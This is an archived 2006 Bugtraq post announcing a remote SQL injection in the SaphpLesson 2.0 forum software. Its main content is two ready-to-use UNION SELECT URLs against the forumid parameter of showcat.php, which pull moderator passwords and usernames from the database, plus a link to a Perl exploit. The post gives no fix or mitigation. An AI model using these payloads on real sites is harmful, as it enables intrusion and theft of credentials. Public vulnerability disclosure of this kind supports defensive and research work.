| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060412213313.25260.qmail@securityfocus.com> Date: 12 Apr 2006 21:33:13 -0000 From: selfar2002@...mail.com To: bugtraq@...urityfocus.com Subject: SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit --------------------------------------------------------------------------- SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit --------------------------------------------------------------------------- Discovered By SnIpEr_SA Author : SnIpEr_SA Exploit in Perl : http://www.milw0rm.com/exploits/download/1530 Remote : Yes Local : No Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Indexu Application : SaphpLesson version : 2.0 URL : http://www.Arabless.com/ ... ------------------------------------------------------------------ Exploit: ~~~~~~~~ # For password # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor # For username # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor --------------------------------------------------------------------------- Contact: ~~~~~~~~ SnIpEr_SA E-mail: selfar2002@...mail.com E-mail: SnIpEr_SA[at]Basdmail[dot]org Homepage: http://www.3asfh.com/ & http://www.lezr.com/ Greetz: All My Frind -------------------------------- [ EOF ] ----------------------------------
Powered by blists - more mailing lists